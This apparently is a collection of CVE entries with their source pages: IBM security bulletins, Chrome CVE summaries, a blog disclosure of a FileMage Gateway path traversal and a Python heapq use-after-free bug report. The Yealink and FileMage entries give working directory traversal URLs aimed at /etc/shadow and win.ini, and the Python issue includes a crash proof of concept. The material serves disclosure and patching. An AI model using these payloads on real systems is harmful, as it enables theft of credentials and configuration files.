Out of bounds memory access in Fonts in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Medium)

CVE-2023-4431

Use after free in Loader in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4429

Out of bounds memory access in V8 in Google Chrome prior to 116.0.5845.110 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: High)

CVE-2023-4427


IBM Robotic Process Automation 21.0.0 through 21.0.7.1 and 23.0.0 through 23.0.1 server could allow an authenticated user to view sensitive information from installation logs.  IBM X-Force Id:  262293.



  

**Summary**

IBM Robotic Process Automation server could allow an authenticated user to view sensitive information from installation logs. Authenticated users are able to view database connection strings in the IBM Robotic Process Automation installation logs.

**Vulnerability Details**

**CVEID:**   CVE-2023-38733  
**DESCRIPTION:**   IBM Robotic Process Automation server could allow an authenticated user to view sensitive information from installation logs.  
CVSS Base score: 4.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/262293 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

21.0.0 - 21.0.7.3, 23.0.0 - 23.0.3

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.0 - 21.0.7.3

Download 21.0.7.4 or higher and follow these instructions.

IBM Robotic Process Automation

23.0.0 - 23.0.3

Download 23.0.4 or higher and follow these instructions.

**Workarounds and Mitigations**

**Workarounds/Mitigation guidance**:

Remove installation logs after installing the IBM Robotic Process Automation Server.

**References**

Off

**Acknowledgement**

Michael Stuy (IBM)

**Change History**

21 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF040","label":"RedHat OpenShift"}\],"Version":"21.0.0 - 21.0.7.3, 23.0.0 - 23.0.3","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-38733: IBM Robotic Process Automation is vulnerable to sensitive information disclosure in installation logs (CVE-2023-38733)


IBM Robotic Process Automation 21.0.0 through 21.0.7.1 runtime is vulnerable to information disclosure of script content if the remote REST request computer policy is enabled.  IBM X-Force ID:  263470.



  

**Summary**

IBM Robotic Process Automation runtime is vulnerable to information disclosure of script content if the remote REST request computer policy is enabled.

**Vulnerability Details**

**CVEID:**   CVE-2023-40370  
**DESCRIPTION:**   IBM Robotic Process Automation runtime is vulnerable to information disclosure of script content if the remote REST request computer policy is enabled.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/263470 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

21.0.0 - 21.0.7.1

IBM Robotic Process Automation for Cloud Pak

21.0.0 - 21.0.7.1

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.0 - 21.0.7.1

Download 21.0.7.2 or higher and follow these instructions.

IBM Robotic Process Automation for Cloud Pak

21.0.0 - 21.0.7.1

Update to 21.0.7.2 or higher using the following instructions. 

**Workarounds and Mitigations**

None.

**References**

Off

**Acknowledgement**

Mariana Penna (IBM)

**Change History**

21 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF040","label":"RedHat OpenShift"}\],"Version":"21.0.0 - 21.0.7.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-40370: IBM Robotic Process Automation is vulnerable to information disclosure of script content (CVE-2023-40370)


IBM Robotic Process Automation 21.0.0 through 21.0.7.1 and 23.0.0 through 23.0.1 is vulnerable to incorrect privilege assignment when importing users from an LDAP directory.  IBM X-Force ID:  262481.



  

**Summary**

IBM Robotic Process Automation is vulnerable to incorrect privilege assignment when importing user from an LDAP directory (CVE-2023-38734).

**Vulnerability Details**

**CVEID:**   CVE-2023-38734  
**DESCRIPTION:**   IBM Robotic Process Automation is vulnerable to incorrect privilege assignment when importing users from an LDAP directory.  
CVSS Base score: 6.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/262481 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM Robotic Process Automation

21.0.0 - 21.0.7.1, 23.0.0 - 23.0.1

**Remediation/Fixes**

**IBM strongly recommends addressing the vulnerability now.**

**Product(s)**

**Version(s) number and/or range** 

**Remediation/Fix/Instructions**

IBM Robotic Process Automation

21.0.0 - 21.0.7.1

Download 21.0.7.2 or higher and follow these instructions.

IBM Robotic Process Automation

23.0.0 - 23.0.1

Download 23.0.2 or higher and follow these instructions.

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

Mariana Penna (IBM)

**Change History**

21 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSC50T","label":"IBM Robotic Process Automation"},"Component":"","Platform":\[{"code":"PF033","label":"Windows"},{"code":"PF040","label":"RedHat OpenShift"}\],"Version":"21.0.0 - 21.0.7.1, 23.0.0 - 23.0.1","Edition":"","Line of Business":{"code":"LOB45","label":"Automation"}}\]

CVE-2023-38734: IBM Robotic Process Automation is vulnerable to incorrect privilege assignment when importing user from an LDAP directory (CVE-2023-38734).

Directory Traversal vulnerability in Contacts File Upload Interface in Yealink W60B version 77.83.0.85, allows attackers to gain sensitive information and cause a denial of service (DoS).

You go to https://{IP}/servlet?m=mod\_data&p=contacts-preview&q=load&handsetid=7&filename={file} and substitute the {file} parameter with the file you want to read, i.e. ../../etc/shadow or ../../proc/cpuinfo

CVE-2020-24113

Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.

**Overview**

Hello all! Long time no see, I recently identified a vulnerability on FileMage Gateway that I applied for my first CVE.

On a recent security assesment, I identified a security vulnerability in FileMage Gateway. It is possible to send an unauthenticated HTTP(s) GET request to retrieve arbitrary files on the host system. This vulnerability is present and identified on the Azure Marketplace product.

**What is Filemage**

FileMage Gateway is an FTP/SFTP server backed by a cloud object storage API. Deployable from your cloud provider marketplace and billed hourly.

**Technical Details**

This section outlines the steps to replicate the exploitation of the identified vulnerability. I deployed an Azure Virtual Machine from the marketplace for the technical analysis. Additional reference material may be requested if needed.

By navigating to the homepage on FileMage Gateway, a path traversal vulnerability is present under the /mgmnt/ directory on the Azure Marketplace Deployment. An unauthenticated HTTPS GET request can be sent using dot-dot slash sequences using URL encoding as observed below.

    URI: /mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5 cwindows%5cwin.ini
    

Deploying a test instance from the Azure Marketplace, process monitoring was leveraged to understand where the sensitive and configuration files are stored in FileMage.

It’s possible for an unauthenticated user to extract sensitive data such as FileMage and PostgresSQL configuration files, SSH keys, and other sensitive files as illustrated in the screenshots below.

This vulnerability was tested on non-azure deployments of FileMage but were found not to be vulnerable to the path traversal. I disclosed this vulnerability with the help of a great friend “Tylous”, thanks! This has since been patched.

**Recommendation**

User-controllable data should be strictly validated before being passed to any filesystem operations. In particular, input containing dot-dot sequences should be blocked. This was disclosed to the vendor

**Patched**

https://www.filemage.io/docs/updates.html - This was updated in 1.10.9 version of FileMage

**Next Steps**

While waiting on the CVE # to publish, I’ll publish the python POC code to exploit this and a nuclei template that I will try to merge with the nuclei-templates repo.

CVE-2023-39026: FileMage Gateway LFI


IBM GSKit-Crypto could allow a remote attacker to obtain sensitive information, caused by a timing-based side channel in the RSA Decryption implementation. By sending an overly large number of trial messages for decryption, an attacker could exploit this vulnerability to obtain sensitive information. IBM X-Force ID: 257132.



  

**Summary**

"Timing Oracle in RSA Decryption " issue may affect GSKit shipped with IBM CICS TX Standard. IBM CICS TX Standard has addressed the applicable CVE.

**Vulnerability Details**

**CVEID:**   CVE-2023-33850  
**DESCRIPTION:**   IBM GSKit-Crypto could allow a remote attacker to obtain sensitive information, caused by a timing-based side channel in the RSA Decryption implementation. By sending an overly large number of trial messages for decryption, an attacker could exploit this vulnerability to obtain sensitive information.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257132 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

IBM CICS TX Standard

11.1

**Remediation/Fixes**

Product

Version

Platform

Remediation / Fix

IBM CICS TX Standard

11.1

Linux

Fix Central Link

**Workarounds and Mitigations**

None

**References**

Off

**Acknowledgement**

**Change History**

07 Aug 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU058","label":"IBM Infrastructure w\\/TPS"},"Product":{"code":"SSZ5810","label":"CICS TX"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"}\],"Version":"11.1","Edition":"","Line of Business":{"code":"LOB35","label":"Mainframe SW"}}\]

CVE-2023-33850: Security Bulletin: "Timing Oracle in RSA Decryption " issue may affect GSKit shipped with IBM CICS TX Standard

A use-after-free exists in Python through 3.9 via heappushpop in heapq.

Issue39421

Created on **2020-01-22 15:11** by **dk0n9**, last changed **2022-04-11 14:59** by **admin**. This issue is now **closed**.

Pull Requests

URL

Status

Linked

Edit

PR 18118

merged

pablogsal, 2020-01-22 15:54

PR 18144

closed

miss-islington, 2020-01-23 14:07

PR 18145

merged

miss-islington, 2020-01-23 14:07

PR 18146

merged

miss-islington, 2020-01-23 14:07

PR 18149

merged

miss-islington, 2020-01-23 15:05

Messages (10)

msg360474 - (view)

Author: Dk0n9 (dk0n9)

Date: 2020-01-22 15:13

The variable \`heap\` in heappushpop does not add a reference count

\`\`\`c
    cmp = PyObject\_RichCompareBool(PyList\_GET\_ITEM(heap, 0), item, Py\_LT);
    if (cmp < 0)
        return NULL;
    if (cmp == 0) {
        Py\_INCREF(item);
        return item;
    }
\`\`\`

POC：
\`\`\`python
import heapq

class h(int):
    def \_\_lt\_\_(self, o):
        list1.clear()
        return NotImplemented

list1 = \[\]

heapq.heappush(list1, h(0))
heapq.heappushpop(list1, 1)
\`\`\`


Crash detail with asan:

==62141==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060000fd778 at pc 0x00000049cdce bp 0x7ffe9690f650 sp 0x7ffe9690f640
READ of size 8 at 0x6060000fd778 thread T0
    #0 0x49cdcd in long\_richcompare Objects/longobject.c:3047
    #1 0x4f9495 in do\_richcompare Objects/object.c:802
    #2 0x4f9495 in PyObject\_RichCompare Objects/object.c:846
    #3 0x4f9495 in PyObject\_RichCompareBool Objects/object.c:868
    #4 0x7ff74c523594 in \_heapq\_heappushpop\_impl /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/\_heapqmodule.c:267
    #5 0x7ff74c523594 in \_heapq\_heappushpop /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/clinic/\_heapqmodule.c.h:109
    #6 0x854c30 in cfunction\_vectorcall\_FASTCALL Objects/methodobject.c:366
    #7 0x443885 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #8 0x443885 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #9 0x443885 in call\_function Python/ceval.c:4850
    #10 0x443885 in \_PyEval\_EvalFrameDefault Python/ceval.c:3306
    #11 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #12 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #13 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #14 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #15 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #16 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #17 0x6862fc in run\_mod Python/pythonrun.c:1147
    #18 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #19 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #20 0x446495 in pymain\_run\_file Modules/main.c:369
    #21 0x446495 in pymain\_run\_python Modules/main.c:553
    #22 0x446495 in Py\_RunMain Modules/main.c:632
    #23 0x446f86 in pymain\_main Modules/main.c:662
    #24 0x446f86 in Py\_BytesMain Modules/main.c:686
    #25 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)
    #26 0x444478 in \_start (/home/\*\*\*/Python-3.9.0a2/python+0x444478)

0x6060000fd778 is located 24 bytes inside of 56-byte region \[0x6060000fd760,0x6060000fd798)
freed by thread T0 here:
    #0 0x7ff7500b72ca in \_\_interceptor\_free (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x982ca)
    #1 0x52a5d9 in subtype\_dealloc Objects/typeobject.c:1291
    #2 0x4222a6 in \_Py\_DECREF Include/object.h:478
    #3 0x4222a6 in frame\_dealloc Objects/frameobject.c:636
    #4 0x422088 in \_Py\_DECREF Include/object.h:478
    #5 0x422088 in function\_code\_fastcall Objects/call.c:335
    #6 0x53aac6 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #7 0x53aac6 in vectorcall\_unbound Objects/typeobject.c:1459
    #8 0x53aac6 in slot\_tp\_richcompare Objects/typeobject.c:6703
    #9 0x4f921d in do\_richcompare Objects/object.c:796
    #10 0x4f921d in PyObject\_RichCompare Objects/object.c:846
    #11 0x4f921d in PyObject\_RichCompareBool Objects/object.c:868
    #12 0x7ff74c523594 in \_heapq\_heappushpop\_impl /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/\_heapqmodule.c:267
    #13 0x7ff74c523594 in \_heapq\_heappushpop /home/\*\*\*\*\*\*/Python-3.9.0a2/Modules/clinic/\_heapqmodule.c.h:109
    #14 0x854c30 in cfunction\_vectorcall\_FASTCALL Objects/methodobject.c:366
    #15 0x443885 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:111
    #16 0x443885 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #17 0x443885 in call\_function Python/ceval.c:4850
    #18 0x443885 in \_PyEval\_EvalFrameDefault Python/ceval.c:3306
    #19 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #20 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #21 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #22 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #23 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #24 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #25 0x6862fc in run\_mod Python/pythonrun.c:1147
    #26 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #27 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #28 0x446495 in pymain\_run\_file Modules/main.c:369
    #29 0x446495 in pymain\_run\_python Modules/main.c:553
    #30 0x446495 in Py\_RunMain Modules/main.c:632
    #31 0x446f86 in pymain\_main Modules/main.c:662
    #32 0x446f86 in Py\_BytesMain Modules/main.c:686
    #33 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

previously allocated by thread T0 here:
    #0 0x7ff7500b7602 in malloc (/usr/lib/x86\_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x6dbfd5 in \_PyObject\_GC\_Alloc Modules/gcmodule.c:2146
    #2 0x6dbfd5 in \_PyObject\_GC\_Malloc Modules/gcmodule.c:2173
    #3 0x527d20 in PyType\_GenericAlloc Objects/typeobject.c:1014
    #4 0x4b890b in long\_subtype\_new Objects/longobject.c:5132
    #5 0x4b890b in long\_new\_impl Objects/longobject.c:5075
    #6 0x4b890b in long\_new Objects/clinic/longobject.c.h:36
    #7 0x52f606 in type\_call Objects/typeobject.c:973
    #8 0x462b46 in \_PyObject\_MakeTpCall Objects/call.c:189
    #9 0x436b70 in \_PyObject\_VectorcallTstate Include/cpython/abstract.h:109
    #10 0x436b70 in \_PyObject\_Vectorcall Include/cpython/abstract.h:120
    #11 0x436b70 in call\_function Python/ceval.c:4850
    #12 0x436b70 in \_PyEval\_EvalFrameDefault Python/ceval.c:3337
    #13 0x5e1d76 in \_PyEval\_EvalFrame Include/internal/pycore\_ceval.h:43
    #14 0x5e1d76 in \_PyEval\_EvalCode Python/ceval.c:4142
    #15 0x5e2207 in \_PyEval\_EvalCodeWithName Python/ceval.c:4174
    #16 0x5e2207 in PyEval\_EvalCodeEx Python/ceval.c:4190
    #17 0x5e2207 in PyEval\_EvalCode Python/ceval.c:717
    #18 0x6862fc in run\_eval\_code\_obj Python/pythonrun.c:1125
    #19 0x6862fc in run\_mod Python/pythonrun.c:1147
    #20 0x6862fc in PyRun\_FileExFlags Python/pythonrun.c:1063
    #21 0x6867b2 in PyRun\_SimpleFileExFlags Python/pythonrun.c:428
    #22 0x446495 in pymain\_run\_file Modules/main.c:369
    #23 0x446495 in pymain\_run\_python Modules/main.c:553
    #24 0x446495 in Py\_RunMain Modules/main.c:632
    #25 0x446f86 in pymain\_main Modules/main.c:662
    #26 0x446f86 in Py\_BytesMain Modules/main.c:686
    #27 0x7ff74f34882f in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free Objects/longobject.c:3047 long\_richcompare
Shadow bytes around the buggy address:
  0x0c0c80017a90: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017aa0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ab0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ac0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c0c80017ad0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c80017ae0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd\[fd\]
  0x0c0c80017af0: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c80017b00: fa fa fa fa fd fd fd fd fd fd fd fd fa fa fa fa
  0x0c0c80017b10: 00 00 00 00 00 00 00 00 fa fa fa fa fd fd fd fd
  0x0c0c80017b20: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c80017b30: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
==62141==ABORTING

msg360475 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 15:31

Reproducible.

It looks similar to bpo-38588.
We will apply the same solution as we did at bpo-38588?
or do we plan to apply the solution which is suggested on msg359023?

msg360477 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-22 15:46

To be honest, given how many ways this bug happens I think its time to consider msg359023.

msg360478 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 15:49

\> To be honest, given how many ways this bug happens I think its time to consider msg359023.

+1 to me also

msg360479 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-22 15:55

AS this discussion will take a while and likely will have deeper consequences, in the meantime I created PR18118 to specifically fix this.

msg360484 - (view)

Author: Dong-hee Na (corona10) \* 

Date: 2020-01-22 16:13

@pablogsal

I agree with hotfix is needed and also for discussion.
I left a comment for PR 18118. Please take a look :)

msg360557 - (view)

Author: Pablo Galindo Salgado (pablogsal) \* 

Date: 2020-01-23 14:07

New changeset 79f89e6e5a659846d1068e8b1bd8e491ccdef861 by Pablo Galindo in branch 'master':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/79f89e6e5a659846d1068e8b1bd8e491ccdef861

msg360558 - (view)

Author: miss-islington (miss-islington)

Date: 2020-01-23 14:25

New changeset 958064f8d2b84062b0582bbae911df8ccfc11fd6 by Miss Islington (bot) in branch '3.7':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/958064f8d2b84062b0582bbae911df8ccfc11fd6

msg360561 - (view)

Author: Ned Deily (ned.deily) \* 

Date: 2020-01-23 14:49

New changeset c563f409ea30bcb0623d785428c9257917371b76 by Ned Deily (Miss Islington (bot)) in branch '3.6':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118) (GH-18146)
https://github.com/python/cpython/commit/c563f409ea30bcb0623d785428c9257917371b76

msg360564 - (view)

Author: miss-islington (miss-islington)

Date: 2020-01-23 15:22

New changeset 993811ffe75c2573f97fb3fd1414b34609b8c8db by Miss Islington (bot) in branch '3.8':
bpo-39421: Fix posible crash in heapq with custom comparison operators (GH-18118)
https://github.com/python/cpython/commit/993811ffe75c2573f97fb3fd1414b34609b8c8db

History

Date

User

Action

Args

2022-04-11 14:59:25

admin

set

github: 83602

2020-01-23 15:23:27

pablogsal

set

status: open -> closed  
resolution: fixed  
stage: patch review -> resolved

2020-01-23 15:22:29

miss-islington

set

messages: + msg360564

2020-01-23 15:05:37

miss-islington

set

pull\_requests: + pull\_request17535

2020-01-23 14:49:23

ned.deily

set

nosy: + ned.deily  
messages: + msg360561  

2020-01-23 14:25:34

miss-islington

set

nosy: + miss-islington  
messages: + msg360558  

2020-01-23 14:07:43

miss-islington

set

pull\_requests: + pull\_request17532

2020-01-23 14:07:37

miss-islington

set

pull\_requests: + pull\_request17531

2020-01-23 14:07:29

miss-islington

set

stage: needs patch -> patch review  
pull\_requests: + pull\_request17530

2020-01-23 14:07:16

pablogsal

set

messages: + msg360557

2020-01-23 13:54:44

alex

set

keywords: + security\_issue  
nosy: + alex  

2020-01-22 16:13:21

corona10

set

messages: + msg360484

2020-01-22 15:55:25

pablogsal

set

messages: + msg360479  
stage: patch review -> needs patch

2020-01-22 15:54:31

pablogsal

set

keywords: + patch  
stage: needs patch -> patch review  
pull\_requests: + pull\_request17505

2020-01-22 15:49:45

corona10

set

messages: + msg360478

2020-01-22 15:46:55

pablogsal

set

messages: + msg360477

2020-01-22 15:32:01

corona10

set

nosy: + vstinner  

2020-01-22 15:31:53

corona10

set

stage: needs patch  
versions: - Python 3.6

2020-01-22 15:31:24

corona10

set

nosy: + pablogsal, corona10, methane  
messages: + msg360475  

2020-01-22 15:13:43

dk0n9

set

messages: + msg360474

2020-01-22 15:11:46

dk0n9

create

Source

CVE